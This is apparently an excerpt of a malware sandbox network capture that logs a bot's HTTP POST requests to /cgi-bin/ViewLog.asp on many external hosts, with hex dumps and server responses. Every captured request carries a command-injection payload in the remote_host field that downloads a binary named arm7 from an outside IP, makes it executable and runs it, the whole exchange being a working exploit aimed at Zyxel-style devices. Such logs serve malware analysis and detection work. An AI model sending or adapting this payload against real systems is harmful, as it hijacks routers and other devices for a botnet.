                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:48.376257896 CET395INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:48 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 178
                                                        Connection: keep-alive
                                                        Location: https://127.0.0.1/cgi-bin/ViewLog.asp
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                        Mar 21, 2024 05:22:48.376322985 CET323INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:48 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        665192.168.2.1340922213.168.80.18080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.186353922 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:51.308985949 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        666192.168.2.135599486.43.114.12380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.191395998 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:48.376506090 CET399INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 04:22:52 GMT
                                                        Server: Webs
                                                        X-Frame-Options: SAMEORIGIN
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        667192.168.2.133320082.165.121.22580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.191495895 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:48.376688957 CET323INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.18.0
                                                        Date: Thu, 21 Mar 2024 04:22:48 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Content-Encoding: gzip
                                                        Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0
                                                        Mar 21, 2024 05:22:48.376729965 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Thu, 21 Mar 2024 04:22:48 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        668192.168.2.133805080.243.217.24680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.196652889 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:49.169620037 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:50.287372112 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:52.591308117 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:57.197454929 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:06.162122965 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:24.592242956 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        669192.168.2.1343650213.59.197.12380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.227291107 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:48.451994896 CET114INHTTP/1.1 307 Moved Temporarily
                                                        Location: https://127.0.0.1/cgi-bin/ViewLog.asp
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        670192.168.2.134191683.66.147.11680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.227397919 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:52.332285881 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
